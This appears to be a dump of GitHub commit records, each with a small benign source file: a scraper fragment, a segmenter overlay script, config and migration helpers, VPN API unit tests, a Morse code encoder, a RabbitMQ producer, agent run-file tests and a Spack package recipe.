return
report = {
'inspector': 'flra',
'inspector_url': 'https://www.flra.gov/OIG',
'agency': 'flra',
'agency_name': 'Federal Labor Relations Authority',
'file_type': 'pdf',
'report_id': report_id,
'url': report_url,
'title': title,
'published_on': datetime.datetime.strftime(published_on, "%Y-%m-%d"),
}
if estimated_date:
report['estimated_date'] = estimated_date
if unreleased:
report['unreleased'] = unreleased
report['landing_url'] = landing_url
return report
utils.run(run) if (__name__ == "__main__") else None
| cc0-1.0 | Python |
|
241cc8fc668b9f6c38d23a97d9ff28cc4c481bf3 | Create github_watchdog,py | gkorg1/watchdog | github_watchdog.py | github_watchdog.py | #!/usr/bin/bash
| apache-2.0 | Python |
|
45af6f13e302fb4e790f8ec5a5730f25c6a9450b | add new segmenter debugging script | mittagessen/kraken,mittagessen/kraken,mittagessen/kraken,mittagessen/kraken | kraken/contrib/heatmap_overlay.py | kraken/contrib/heatmap_overlay.py | #! /usr/bin/env python
"""
Produces semi-transparent neural segmenter output overlays
"""
import sys
import torch
import numpy as np
from PIL import Image
from kraken.lib import segmentation, vgsl, dataset
import torch.nn.functional as F
from typing import *
import glob
from os.path import splitext, exists
model = vgsl.TorchVGSLModel.load_model(sys.argv[1])
model.eval()
batch, channels, height, width = model.input
transforms = dataset.generate_input_transforms(batch, height, width, channels, 0, valid_norm=False)
imgs = sys.argv[2:]
torch.set_num_threads(1)
for img in imgs:
print(img)
im = Image.open(img)
with torch.no_grad():
o = model.nn(transforms(im).unsqueeze(0))
o = F.interpolate(o, size=im.size[::-1])
o = o.squeeze().numpy()
heat = Image.fromarray((o[1]*255).astype('uint8'))
heat.save(splitext(img)[0] + '.heat.png')
overlay = Image.new('RGBA', im.size, (0, 130, 200, 255))
Image.composite(overlay, im.convert('RGBA'), heat).save(splitext(img)[0] + '.overlay.png')
del o
del im
| apache-2.0 | Python |
|
d39a3bae3f6ca66df044e725cd164082170f4ec7 | Modify the config file. | xgfone/snippet,xgfone/snippet,xgfone/snippet,xgfone/snippet,xgfone/snippet,xgfone/snippet,xgfone/snippet | snippet/lib/python/config.py | snippet/lib/python/config.py | # coding: utf-8
from oslo_config import cfg
from oslo_log import log
CONF = cfg.CONF
_ROOTS = ["root"]
_DEFAULT_LOG_LEVELS = ['root=INFO']
_DEFAULT_LOG_FORMAT = "%(asctime)s - %(name)s - %(levelname)s - %(message)s"
def parse_args(argv, project, version=None, default_config_files=None,
default_log_format=None, default_log_levels=None):
if project not in _ROOTS:
_DEFAULT_LOG_LEVELS.append('%s=INFO' % project)
_ROOTS.append(project)
log_fmt = default_log_format if default_log_format else _DEFAULT_LOG_FORMAT
log_lvl = default_log_levels if default_log_levels else _DEFAULT_LOG_LEVELS
log.set_defaults(log_fmt, log_lvl)
log.register_options(CONF)
# (TODO): Configure the options of the other libraries, which must be called
# before parsing the configuration file.
CONF(argv[1:], project=project, version=version,
default_config_files=default_config_files)
| mit | Python |
|
be2f50aae308377dbabd66b5ec78ffb2bd8ae218 | Add tse_number as index | scorphus/politicos | politicos/migrations/versions/488fc5ad2ffa_political_party_add_tse_number_as_index.py | politicos/migrations/versions/488fc5ad2ffa_political_party_add_tse_number_as_index.py | """political party: add tse_number as index
Revision ID: 488fc5ad2ffa
Revises: 192bd4ccdacb
Create Date: 2015-07-08 13:44:38.208146
"""
# revision identifiers, used by Alembic.
revision = '488fc5ad2ffa'
down_revision = '192bd4ccdacb'
from alembic import op
def upgrade():
op.create_index('idx_tse_number', 'political_party', ['tse_number'])
def downgrade():
op.drop_index('idx_tse_number', 'political_party')
| agpl-3.0 | Python |
|
96ecfaa423b2d7829fcda0e56e9adba41a4c6819 | Add unit_tests/s2s_vpn | daxm/fmcapi,daxm/fmcapi | unit_tests/s2s_vpn.py | unit_tests/s2s_vpn.py | import logging
import fmcapi
import time
def test_ftds2svpns(fmc):
logging.info('Testing FTDS2SVPNs class. Requires at least one registered device.')
starttime = str(int(time.time()))
namer = f'_fmcapi_test_{starttime}'
# Create a Site2Site VPN Policy
vpnpol1 = fmcapi.FTDS2SVPNs(fmc=fmc, name=namer)
vpnpol1.topologyType = "POINT_TO_POINT"
vpnpol1.ikeV1Enabled = True
vpnpol1.ikeV2Enabled = False
vpnpol1.post()
vpnpol1.get()
# Create some network objects for the encryption domains
obj1 = fmcapi.Networks(fmc=fmc)
obj1.name = '_net1_site1'
obj1.value = '10.255.0.0/24'
obj1.post()
time.sleep(1)
obj2 = fmcapi.Networks(fmc=fmc)
obj2.name = '_net2_site1'
obj2.value = '10.255.1.0/24'
obj2.post()
time.sleep(1)
obj3 = fmcapi.Networks(fmc=fmc)
obj3.name = '_net1_site2'
obj3.value = '10.255.2.0/24'
obj3.post()
time.sleep(1)
# Create Phase 1 settings
# There is no way to search by name, so we just find the iksettings object inside the vpn policy
ike1_json = fmcapi.IKESettings(fmc=fmc)
ike1_json.vpn_policy(pol_name=namer)
items = ike1_json.get()['items'][0]
ike1 = fmcapi.IKESettings(fmc=fmc)
ike1.vpn_policy(pol_name=namer)
ike1.id = items['id']
ike1.get()
ike1.ike_policy(pol_name="preshared_sha_aes192_dh5_10")
ike1.put()
#Create Phase 2 settings
# There is no way to search by name, so we just find the ipsecsettings object inside the vpn policy
ipsec1_json = fmcapi.IPSecSettings(fmc=fmc)
ipsec1_json.vpn_policy(pol_name=namer)
items = ipsec1_json.get()['items'][0]
ipsec1 = fmcapi.IPSecSettings(fmc=fmc)
ipsec1.vpn_policy(pol_name=namer)
ipsec1.id = items['id']
ipsec1.get()
ipsec1.ipsec_policy(pol_name="tunnel_aes256_sha")
ipsec1.put()
#Add vpn peers
#FTD in HA mode should use the name of logical HA device
endp1 = fmcapi.Endpoints(fmc=fmc)
endp1.peerType = "PEER"
endp1.connectionType = "BIDIRECTIONAL"
endp1.vpn_policy(pol_name=namer)
endp1.endpoint(action='add', device_name="_ha_name")
endp1.vpn_interface(device_name='_ha_name', ifname="OUTSIDE1")
endp1.encryption_domain(action='add', names=[
"_net1_site1", "_net2_site1"])
endp2 = fmcapi.Endpoints(fmc=fmc)
endp2.peerType = "PEER"
endp2.connectionType = "BIDIRECTIONAL"
endp2.vpn_policy(pol_name=namer)
endp2.endpoint(action='add', device_name="_device_name")
endp2.vpn_interface(device_name='device_name', ifname="OUTSIDE1")
endp2.encryption_domain(action='add', names=[
"_net1_site2"])
endp1.post()
endp2.post()
time.sleep(30)
vpnpol1.delete()
obj1.delete()
obj2.delete()
obj3.delete() | bsd-3-clause | Python |
|
75756f20d4b63daa8425609620e4b32dcb9faab4 | Add cryptography unit with morse code functions | Harmon758/Harmonbot,Harmon758/Harmonbot | units/cryptography.py | units/cryptography.py |
from .errors import UnitOutputError
character_to_morse = {
'A': ".-", 'B': "-...", 'C': "-.-.", 'D': "-..", 'E': '.', 'F': "..-.", 'G': "--.", 'H': "....",
'I': "..", 'J': ".---", 'K': "-.-", 'L': ".-..", 'M': "--", 'N': "-.", 'O': "---", 'P': ".--.",
'Q': "--.-", 'R': ".-.", 'S': "...", 'T': '-', 'U': "..-", 'V': "...-", 'W': ".--", 'X': "-..-",
'Y': "-.--", 'Z': "--..", '0': "----", '1': ".----", '2': "..---", '3': "...--", '4': "....-",
'5': ".....", '6': "-....", '7': "--...", '8': "---..", '9': "----.", '.': ".-.-.-", ',': "--..--",
':': "---...", '?': "..--..", "'": ".---.", '-': "-....-", '/': "-..-.", '!': "-.-.--",
'(': "-.--.", ')': "-.--.-", '&': ".-...", ';': "-.-.-.", '=': "-...-", '+': ".-.-.",
'_': "..--.-", '"': ".-..-.", '$': "...-..-", '@': ".--.-.", ' ': '/'
}
morse_to_character = {value: key for key, value in character_to_morse.items()}
def encode_morse_code(message):
try:
return ' '.join(character_to_morse[character] for character in message.upper())
except KeyError as e:
raise UnitOutputError(f"Unable to encode {e}")
def decode_morse_code(message):
try:
return ' '.join(''.join(morse_to_character[character] for character in word.split(' ')) for word in message.split(" / "))
except KeyError as e:
raise UnitOutputError(f"Unable to decode {e}")
| mit | Python |
|
93b3cfb5dd465f956fa6c9ceb09be430684c85ae | Add two pass solution | lemming52/white_pawn,lemming52/white_pawn | leetcode/q019/solution.py | leetcode/q019/solution.py | """
Given a linked list, remove the n-th node from the end of list and return its head.
Example:
Given linked list: 1->2->3->4->5, and n = 2.
After removing the second node from the end, the linked list becomes 1->2->3->5.
Note:
Given n will always be valid.
"""
# Definition for singly-linked list.
# class ListNode:
# def __init__(self, x):
# self.val = x
# self.next = None
class Solution:
def removeNthFromEnd(self, head: ListNode, n: int) -> ListNode:
d = 1
current = head.next
while current:
d += 1
current = current.next
removal_index = d - n
if removal_index <= 0:
return head.next
counter = 1
prior = head
current = head.next
while counter < removal_index:
prior = current
current = prior.next
counter += 1
if current.next is None:
prior.next = None
else:
following = current.next
prior.next = following
return head
| mit | Python |
|
295823afe17cedaa1934afbcd19d955974089c63 | Add producer written in Python | jovannypcg/rabbitmq_usage,jovannypcg/rabbitmq_usage | python/send.py | python/send.py | #!/usr/bin/env python
import pika
# Host in which RabbitMQ is running.
HOST = 'localhost'
# Name of the queue.
QUEUE = 'pages'
# The message to send.
MESSAGE = 'Hi there! This is a test message =)'
# Getting the connection using pika.
# Creating the channel.
# Declaring the queue.
connection = pika.BlockingConnection(pika.ConnectionParameters(HOST))
channel = connection.channel()
channel.queue_declare(queue=QUEUE)
# Sends the 'MESSAGE' to the queue.
# Default empty 'exchange' with 'routing_key' equal to the queue name
# will route the message to that queue.
channel.publish(exchange='', routing_key=QUEUE, body=MESSAGE)
# The connection is closed.
connection.close()
| apache-2.0 | Python |
|
04c8b38ac43c84abe64858cfd22a721e803b87eb | add mocked tests for internal /run folder | lookout/dd-agent,a20012251/dd-agent,gphat/dd-agent,pmav99/praktoras,cberry777/dd-agent,jvassev/dd-agent,c960657/dd-agent,AntoCard/powerdns-recursor_check,takus/dd-agent,truthbk/dd-agent,joelvanvelden/dd-agent,AntoCard/powerdns-recursor_check,ess/dd-agent,tebriel/dd-agent,a20012251/dd-agent,takus/dd-agent,Mashape/dd-agent,pfmooney/dd-agent,eeroniemi/dd-agent,huhongbo/dd-agent,huhongbo/dd-agent,eeroniemi/dd-agent,PagerDuty/dd-agent,c960657/dd-agent,eeroniemi/dd-agent,brettlangdon/dd-agent,jvassev/dd-agent,urosgruber/dd-agent,jamesandariese/dd-agent,zendesk/dd-agent,AniruddhaSAtre/dd-agent,guruxu/dd-agent,mderomph-coolblue/dd-agent,ess/dd-agent,truthbk/dd-agent,cberry777/dd-agent,mderomph-coolblue/dd-agent,yuecong/dd-agent,AntoCard/powerdns-recursor_check,polynomial/dd-agent,manolama/dd-agent,relateiq/dd-agent,jraede/dd-agent,takus/dd-agent,jraede/dd-agent,PagerDuty/dd-agent,guruxu/dd-agent,jyogi/purvar-agent,AniruddhaSAtre/dd-agent,darron/dd-agent,jvassev/dd-agent,c960657/dd-agent,a20012251/dd-agent,huhongbo/dd-agent,darron/dd-agent,urosgruber/dd-agent,oneandoneis2/dd-agent,brettlangdon/dd-agent,amalakar/dd-agent,jamesandariese/dd-agent,darron/dd-agent,jamesandariese/dd-agent,ess/dd-agent,citrusleaf/dd-agent,darron/dd-agent,remh/dd-agent,huhongbo/dd-agent,jshum/dd-agent,polynomial/dd-agent,GabrielNicolasAvellaneda/dd-agent,ess/dd-agent,gphat/dd-agent,jyogi/purvar-agent,gphat/dd-agent,a20012251/dd-agent,manolama/dd-agent,Shopify/dd-agent,GabrielNicolasAvellaneda/dd-agent,benmccann/dd-agent,relateiq/dd-agent,relateiq/dd-agent,lookout/dd-agent,pmav99/praktoras,gphat/dd-agent,takus/dd-agent,Mashape/dd-agent,benmccann/dd-agent,tebriel/dd-agent,oneandoneis2/dd-agent,tebriel/dd-agent,jyogi/purvar-agent,jyogi/purvar-agent,Mashape/dd-agent,Mashape/dd-agent,pfmooney/dd-agent,packetloop/dd-agent,jyogi/purvar-agent,jamesandariese/dd-agent,amalakar/dd-agent,relateiq/dd-agent,zendesk/dd-agent,benmccann/dd-agent,indeedops/dd-agent,amalakar/dd-agent,mderomph-coolblue/dd-agent,c960657/dd-agent,Shopify/dd-agent,PagerDuty/dd-agent,remh/dd-agent,pfmooney/dd-agent,guruxu/dd-agent,pmav99/praktoras,jraede/dd-agent,Shopify/dd-agent,citrusleaf/dd-agent,urosgruber/dd-agent,oneandoneis2/dd-agent,indeedops/dd-agent,ess/dd-agent,relateiq/dd-agent,AntoCard/powerdns-recursor_check,Wattpad/dd-agent,yuecong/dd-agent,tebriel/dd-agent,indeedops/dd-agent,truthbk/dd-agent,mderomph-coolblue/dd-agent,pmav99/praktoras,brettlangdon/dd-agent,oneandoneis2/dd-agent,pfmooney/dd-agent,benmccann/dd-agent,citrusleaf/dd-agent,manolama/dd-agent,Wattpad/dd-agent,jraede/dd-agent,Shopify/dd-agent,lookout/dd-agent,yuecong/dd-agent,AntoCard/powerdns-recursor_check,Wattpad/dd-agent,AniruddhaSAtre/dd-agent,a20012251/dd-agent,brettlangdon/dd-agent,guruxu/dd-agent,jshum/dd-agent,indeedops/dd-agent,joelvanvelden/dd-agent,eeroniemi/dd-agent,joelvanvelden/dd-agent,eeroniemi/dd-agent,jshum/dd-agent,AniruddhaSAtre/dd-agent,indeedops/dd-agent,jvassev/dd-agent,urosgruber/dd-agent,GabrielNicolasAvellaneda/dd-agent,zendesk/dd-agent,brettlangdon/dd-agent,GabrielNicolasAvellaneda/dd-agent,truthbk/dd-agent,citrusleaf/dd-agent,Wattpad/dd-agent,amalakar/dd-agent,Wattpad/dd-agent,zendesk/dd-agent,cberry777/dd-agent,zendesk/dd-agent,citrusleaf/dd-agent,polynomial/dd-agent,pfmooney/dd-agent,huhongbo/dd-agent,jamesandariese/dd-agent,amalakar/dd-agent,jshum/dd-agent,packetloop/dd-agent,c960657/dd-agent,truthbk/dd-agent,pmav99/praktoras,joelvanvelden/dd-agent,remh/dd-agent,polynomial/dd-agent,remh/dd-agent,darron/dd-agent,manolama/dd-agent,mderomph-coolblue/dd-agent,jraede/dd-agent,PagerDuty/dd-agent,lookout/dd-agent,polynomial/dd-agent,yuecong/dd-agent,urosgruber/dd-agent,remh/dd-agent,cberry777/dd-agent,takus/dd-agent,Shopify/dd-agent,packetloop/dd-agent,oneandoneis2/dd-agent,AniruddhaSAtre/dd-agent,PagerDuty/dd-agent,lookout/dd-agent,jvassev/dd-agent,manolama/dd-agent,packetloop/dd-agent,tebriel/dd-agent,gphat/dd-agent,joelvanvelden/dd-agent,benmccann/dd-agent,cberry777/dd-agent,guruxu/dd-agent,Mashape/dd-agent,GabrielNicolasAvellaneda/dd-agent,jshum/dd-agent,yuecong/dd-agent,packetloop/dd-agent | tests/core/test_run_files.py | tests/core/test_run_files.py | # stdlib
import os
import shlex
import signal
import subprocess
import time
import unittest
# 3p
import mock
from nose.plugins.attrib import attr
# Mock gettempdir for testing
import tempfile; tempfile.gettempdir = mock.Mock(return_value='/a/test/tmp/dir')
# project
# Mock _windows_commondata_path for testing
import config; config._windows_commondata_path = mock.Mock(return_value='./windows_commondata')
from utils.pidfile import PidFile
from checks.check_status import AgentStatus
class TestRunFiles(unittest.TestCase):
""" Tests that runfiles (.pid, .sock, .pickle etc.) are written to internal agent folders"""
# Mac run directory expected location
_my_dir = os.path.dirname(os.path.abspath(__file__))
_mac_run_dir = '/'.join(_my_dir.split('/')[:-4])
def setUp(self):
self.agent_daemon = None
def tearDown(self):
if self.agent_daemon:
args = shlex.split('python agent.py stop')
subprocess.Popen(args).communicate()
@mock.patch('utils.platform.Platform.is_win32', return_value=True)
def test_agent_status_pickle_file_win32(self, *mocks):
''' Test pickle file location on win32 '''
expected_path = os.path.join('.', 'windows_commondata', 'Datadog', 'AgentStatus.pickle')
# check AgentStatus pickle created
self.assertEqual(AgentStatus._get_pickle_path(), expected_path)
@mock.patch('utils.pidfile.PidFile.get_dir', return_value=_mac_run_dir)
@mock.patch('utils.platform.Platform.is_win32', return_value=False)
@mock.patch('utils.platform.Platform.is_mac', return_value=True)
def test_agent_status_pickle_file_mac_dmg(self, *mocks):
''' Test pickle file location when running a Mac DMG install '''
expected_path = os.path.join(self._mac_run_dir, 'AgentStatus.pickle')
self.assertEqual(AgentStatus._get_pickle_path(), expected_path)
@mock.patch('utils.platform.Platform.is_win32', return_value=False)
@mock.patch('utils.platform.Platform.is_mac', return_value=True)
def test_agent_status_pickle_file_mac_source(self, *mocks):
''' Test pickle file location when running a Mac source install '''
expected_path = os.path.join('/a/test/tmp/dir', 'AgentStatus.pickle')
self.assertEqual(AgentStatus._get_pickle_path(), expected_path)
| bsd-3-clause | Python |
|
cf9299aad62828f1cd116403076b2a6b086721d8 | add meta utilities | fr3akout/flask_ember | flask_ember/util/meta.py | flask_ember/util/meta.py | import inspect
def get_class_fields(klass, predicate=None):
return [(name, field) for name, field in klass.__dict__.items()
if (predicate(name, field) if predicate else True)]
def get_fields(klass, predicate=None):
fields = list()
for base in inspect.getmro(klass)[::-1]:
fields.extend(get_class_fields(base, predicate))
return fields
def get_methods(klass):
return get_fields(klass, lambda name, field: inspect.isfunction(field))
| bsd-3-clause | Python |
|
481a920fe89ea7f0e518b8cf815f966715b20ca3 | add new package : activemq (#14142) | iulian787/spack,LLNL/spack,iulian787/spack,iulian787/spack,iulian787/spack,iulian787/spack,LLNL/spack,LLNL/spack,LLNL/spack,LLNL/spack | var/spack/repos/builtin/packages/activemq/package.py | var/spack/repos/builtin/packages/activemq/package.py | # Copyright 2013-2019 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class Activemq(Package):
"""
Apache ActiveMQ is a high performance Apache 2.0 licensed Message Broker
and JMS 1.1 implementation.
"""
homepage = "https://archive.apache.org/dist/activemq"
url = "https://archive.apache.org/dist/activemq/5.14.0/apache-activemq-5.14.0-bin.tar.gz"
version('5.14.0', sha256='81c623465af277dd50a141a8d9308d6ec8e1b78d9019b845873dc12d117aa9a6')
def install(self, spec, prefix):
install_tree('.', prefix)
| lgpl-2.1 | Python |
|
6b9adf9f00b481562cedf2debc5aede947734744 | remove dot | credativUK/OCB,goliveirab/odoo,markeTIC/OCB,cdrooom/odoo,jaxkodex/odoo,guerrerocarlos/odoo,sv-dev1/odoo,Daniel-CA/odoo,nuncjo/odoo,rschnapka/odoo,sebalix/OpenUpgrade,nuncjo/odoo,feroda/odoo,Endika/OpenUpgrade,PongPi/isl-odoo,shaufi/odoo,alexteodor/odoo,pplatek/odoo,jaxkodex/odoo,Ernesto99/odoo,OpenUpgrade/OpenUpgrade,jolevq/odoopub,tangyiyong/odoo,acshan/odoo,hmen89/odoo,stonegithubs/odoo,ovnicraft/odoo,wangjun/odoo,hassoon3/odoo,numerigraphe/odoo,salaria/odoo,ramitalat/odoo,jiangzhixiao/odoo,abenzbiria/clients_odoo,RafaelTorrealba/odoo,stonegithubs/odoo,RafaelTorrealba/odoo,Elico-Corp/odoo_OCB,shaufi/odoo,ApuliaSoftware/odoo,vnsofthe/odoo,TRESCLOUD/odoopub,CopeX/odoo,cpyou/odoo,Endika/odoo,QianBIG/odoo,slevenhagen/odoo-npg,avoinsystems/odoo,NL66278/OCB,gsmartway/odoo,JCA-Developpement/Odoo,shingonoide/odoo,fuselock/odoo,brijeshkesariya/odoo,odoousers2014/odoo,Nowheresly/odoo,nuuuboo/odoo,provaleks/o8,minhtuancn/odoo,Bachaco-ve/odoo,slevenhagen/odoo,nitinitprof/odoo,damdam-s/OpenUpgrade,abdellatifkarroum/odoo,ubic135/odoo-design,joariasl/odoo,ubic135/odoo-design,grap/OCB,ovnicraft/odoo,acshan/odoo,jpshort/odoo,RafaelTorrealba/odoo,rubencabrera/odoo,collex100/odoo,camptocamp/ngo-addons-backport,osvalr/odoo,nuuuboo/odoo,nexiles/odoo,BT-astauder/odoo,rschnapka/odoo,hip-odoo/odoo,juanalfonsopr/odoo,blaggacao/OpenUpgrade,grap/OCB,Endika/OpenUpgrade,sinbazhou/odoo,jfpla/odoo,ramadhane/odoo,microcom/odoo,OpenUpgrade-dev/OpenUpgrade,oliverhr/odoo,Kilhog/odoo,fdvarela/odoo8,gsmartway/odoo,andreparames/odoo,dezynetechnologies/odoo,odoo-turkiye/odoo,steedos/odoo,jaxkodex/odoo,hubsaysnuaa/odoo,joshuajan/odoo,apanju/odoo,addition-it-solutions/project-all,eino-makitalo/odoo,lombritz/odoo,jiachenning/odoo,makinacorpus/odoo,bplancher/odoo,nuuuboo/odoo,omprakasha/odoo,alhashash/odoo,dgzurita/odoo,florian-dacosta/OpenUpgrade,demon-ru/iml-crm,tarzan0820/odoo,omprakasha/odoo,gorjuce/odoo,chiragjogi/odoo,camptocamp/ngo-addons-backport,rowemoore/odoo,ecosoft-odoo/odoo,erkrishna9/odoo,gvb/odoo,n0m4dz/odoo,luiseduardohdbackup/odoo,havt/odoo,alexcuellar/odoo,spadae22/odoo,odooindia/odoo,gavin-feng/odoo,gdgellatly/OCB1,Endika/odoo,xzYue/odoo,florentx/OpenUpgrade,fevxie/odoo,Nick-OpusVL/odoo,jiachenning/odoo,luistorresm/odoo,CopeX/odoo,gavin-feng/odoo,Endika/OpenUpgrade,shivam1111/odoo,dalegregory/odoo,blaggacao/OpenUpgrade,Nowheresly/odoo,patmcb/odoo,gvb/odoo,csrocha/OpenUpgrade,nitinitprof/odoo,prospwro/odoo,nhomar/odoo,collex100/odoo,sinbazhou/odoo,fossoult/odoo,ehirt/odoo,abdellatifkarroum/odoo,thanhacun/odoo,ramadhane/odoo,patmcb/odoo,hmen89/odoo,credativUK/OCB,luiseduardohdbackup/odoo,bwrsandman/OpenUpgrade,alhashash/odoo,doomsterinc/odoo,sinbazhou/odoo,Noviat/odoo,Maspear/odoo,Endika/OpenUpgrade,tangyiyong/odoo,OpenUpgrade-dev/OpenUpgrade,jiangzhixiao/odoo,ihsanudin/odoo,alhashash/odoo,camptocamp/ngo-addons-backport,camptocamp/ngo-addons-backport,janocat/odoo,microcom/odoo,vrenaville/ngo-addons-backport,stephen144/odoo,ccomb/OpenUpgrade,brijeshkesariya/odoo,mvaled/OpenUpgrade,ShineFan/odoo,CatsAndDogsbvba/odoo,VielSoft/odoo,mustafat/odoo-1,joariasl/odoo,OSSESAC/odoopubarquiluz,guewen/OpenUpgrade,lombritz/odoo,dezynetechnologies/odoo,Elico-Corp/odoo_OCB,mkieszek/odoo,odoousers2014/odoo,javierTerry/odoo,kifcaliph/odoo,Danisan/odoo-1,hanicker/odoo,frouty/odoo_oph,glovebx/odoo,Eric-Zhong/odoo,joshuajan/odoo,gvb/odoo,windedge/odoo,colinnewell/odoo,collex100/odoo,nuncjo/odoo,AuyaJackie/odoo,gorjuce/odoo,blaggacao/OpenUpgrade,fgesora/odoo,shaufi/odoo,MarcosCommunity/odoo,kittiu/odoo,fuselock/odoo,fgesora/odoo,bwrsandman/OpenUpgrade,gvb/odoo,ApuliaSoftware/odoo,osvalr/odoo,FlorianLudwig/odoo,BT-astauder/odoo,matrixise/odoo,cedk/odoo,jolevq/odoopub,massot/odoo,ovnicraft/odoo,waytai/odoo,leorochael/odoo,poljeff/odoo,RafaelTorrealba/odoo,oasiswork/odoo,0k/odoo,OpenPymeMx/OCB,xzYue/odoo,sergio-incaser/odoo,brijeshkesariya/odoo,cloud9UG/odoo,nagyistoce/odoo-dev-odoo,Drooids/odoo,alhashash/odoo,ramadhane/odoo,hoatle/odoo,spadae22/odoo,bealdav/OpenUpgrade,mkieszek/odoo,pedrobaeza/odoo,ThinkOpen-Solutions/odoo,alhashash/odoo,tinkhaven-organization/odoo,incaser/odoo-odoo,SerpentCS/odoo,pedrobaeza/OpenUpgrade,cedk/odoo,tinkhaven-organization/odoo,OpenUpgrade/OpenUpgrade,bakhtout/odoo-educ,mvaled/OpenUpgrade,jeasoft/odoo,Gitlab11/odoo,Danisan/odoo-1,ApuliaSoftware/odoo,odoousers2014/odoo,sinbazhou/odoo,funkring/fdoo,NeovaHealth/odoo,JGarcia-Panach/odoo,joshuajan/odoo,goliveirab/odoo,bealdav/OpenUpgrade,KontorConsulting/odoo,goliveirab/odoo,rubencabrera/odoo,MarcosCommunity/odoo,Drooids/odoo,cloud9UG/odoo,fevxie/odoo,ChanduERP/odoo,mustafat/odoo-1,tinkerthaler/odoo,tinkerthaler/odoo,ShineFan/odoo,PongPi/isl-odoo,tinkerthaler/odoo,odoousers2014/odoo,NeovaHealth/odoo,CatsAndDogsbvba/odoo,PongPi/isl-odoo,rahuldhote/odoo,dezynetechnologies/odoo,elmerdpadilla/iv,nhomar/odoo-mirror,ThinkOpen-Solutions/odoo,patmcb/odoo,stonegithubs/odoo,OpenUpgrade-dev/OpenUpgrade,rahuldhote/odoo,takis/odoo,Bachaco-ve/odoo,Bachaco-ve/odoo,MarcosCommunity/odoo,lgscofield/odoo,thanhacun/odoo,Antiun/odoo,nagyistoce/odoo-dev-odoo,hassoon3/odoo,windedge/odoo,joariasl/odoo,cloud9UG/odoo,synconics/odoo,NeovaHealth/odoo,CubicERP/odoo,matrixise/odoo,diagramsoftware/odoo,slevenhagen/odoo-npg,datenbetrieb/odoo,gorjuce/odoo,frouty/odoogoeen,chiragjogi/odoo,feroda/odoo,nhomar/odoo,poljeff/odoo,factorlibre/OCB,kybriainfotech/iSocioCRM,sysadminmatmoz/OCB,hubsaysnuaa/odoo,Daniel-CA/odoo,klunwebale/odoo,ApuliaSoftware/odoo,bwrsandman/OpenUpgrade,Endika/odoo,poljeff/odoo,simongoffin/website_version,minhtuancn/odoo,syci/OCB,oliverhr/odoo,feroda/odoo,BT-fgarbely/odoo,hmen89/odoo,kirca/OpenUpgrade,frouty/odoogoeen,provaleks/o8,gavin-feng/odoo,fjbatresv/odoo,thanhacun/odoo,simongoffin/website_version,OSSESAC/odoopubarquiluz,bguillot/OpenUpgrade,rschnapka/odoo,srimai/odoo,gdgellatly/OCB1,kifcaliph/odoo,Nowheresly/odoo,QianBIG/odoo,ingadhoc/odoo,microcom/odoo,hbrunn/OpenUpgrade,fgesora/odoo,NeovaHealth/odoo,sinbazhou/odoo,ClearCorp-dev/odoo,jeasoft/odoo,jesramirez/odoo,havt/odoo,cedk/odoo,erkrishna9/odoo,Kilhog/odoo,tvibliani/odoo,gvb/odoo,mlaitinen/odoo,charbeljc/OCB,nexiles/odoo,fuhongliang/odoo,hanicker/odoo,fevxie/odoo,deKupini/erp,VielSoft/odoo,nuncjo/odoo,savoirfairelinux/OpenUpgrade,NL66278/OCB,VitalPet/odoo,Danisan/odoo-1,apocalypsebg/odoo,highco-groupe/odoo,goliveirab/odoo,frouty/odoogoeen,BT-astauder/odoo,doomsterinc/odoo,hbrunn/OpenUpgrade,ovnicraft/odoo,chiragjogi/odoo,odootr/odoo,hip-odoo/odoo,florentx/OpenUpgrade,nuncjo/odoo,diagramsoftware/odoo,ehirt/odoo,ujjwalwahi/odoo,acshan/odoo,grap/OpenUpgrade,ApuliaSoftware/odoo,goliveirab/odoo,steedos/odoo,datenbetrieb/odoo,savoirfairelinux/OpenUpgrade,tvibliani/odoo,takis/odoo,alqfahad/odoo,demon-ru/iml-crm,alqfahad/odoo,Maspear/odoo,jfpla/odoo,doomsterinc/odoo,apanju/odoo,0k/odoo,0k/odoo,sve-odoo/odoo,Noviat/odoo,Codefans-fan/odoo,nexiles/odoo,mkieszek/odoo,christophlsa/odoo,QianBIG/odoo,ujjwalwahi/odoo,pedrobaeza/OpenUpgrade,0k/odoo,AuyaJackie/odoo,havt/odoo,matrixise/odoo,shaufi10/odoo,bobisme/odoo,GauravSahu/odoo,odoo-turkiye/odoo,NL66278/OCB,sv-dev1/odoo,sve-odoo/odoo,minhtuancn/odoo,CatsAndDogsbvba/odoo,oasiswork/odoo,credativUK/OCB,syci/OCB,doomsterinc/odoo,provaleks/o8,hassoon3/odoo,kybriainfotech/iSocioCRM,steedos/odoo,numerigraphe/odoo,fuhongliang/odoo,lsinfo/odoo,deKupini/erp,Ichag/odoo,jiachenning/odoo,BT-fgarbely/odoo,javierTerry/odoo,QianBIG/odoo,laslabs/odoo,abdellatifkarroum/odoo,demon-ru/iml-crm,collex100/odoo,TRESCLOUD/odoopub,0k/OpenUpgrade,ChanduERP/odoo,camptocamp/ngo-addons-backport,nuuuboo/odoo,Endika/OpenUpgrade,ygol/odoo,cysnake4713/odoo,fuhongliang/odoo,KontorConsulting/odoo,hopeall/odoo,tinkerthaler/odoo,vrenaville/ngo-addons-backport,bkirui/odoo,andreparames/odoo,lightcn/odoo,rdeheele/odoo,rowemoore/odoo,BT-ojossen/odoo,srsman/odoo,agrista/odoo-saas,feroda/odoo,takis/odoo,janocat/odoo,jiangzhixiao/odoo,savoirfairelinux/OpenUpgrade,hubsaysnuaa/odoo,highco-groupe/odoo,SAM-IT-SA/odoo,JonathanStein/odoo,funkring/fdoo,sysadminmatmoz/OCB,sve-odoo/odoo,optima-ict/odoo,slevenhagen/odoo,mlaitinen/odoo,ingadhoc/odoo,goliveirab/odoo,alexcuellar/odoo,fuhongliang/odoo,Codefans-fan/odoo,jolevq/odoopub,SAM-IT-SA/odoo,factorlibre/OCB,shaufi10/odoo,elmerdpadilla/iv,x111ong/odoo,mszewczy/odoo,fevxie/odoo,jpshort/odoo,slevenhagen/odoo-npg,pplatek/odoo,pplatek/odoo,nitinitprof/odoo,doomsterinc/odoo,ihsanudin/odoo,laslabs/odoo,fossoult/odoo,inspyration/odoo,shaufi/odoo,FlorianLudwig/odoo,virgree/odoo,JonathanStein/odoo,SAM-IT-SA/odoo,brijeshkesariya/odoo,jfpla/odoo,VitalPet/odoo,JGarcia-Panach/odoo,sv-dev1/odoo,ingadhoc/odoo,draugiskisprendimai/odoo,Maspear/odoo,aviciimaxwell/od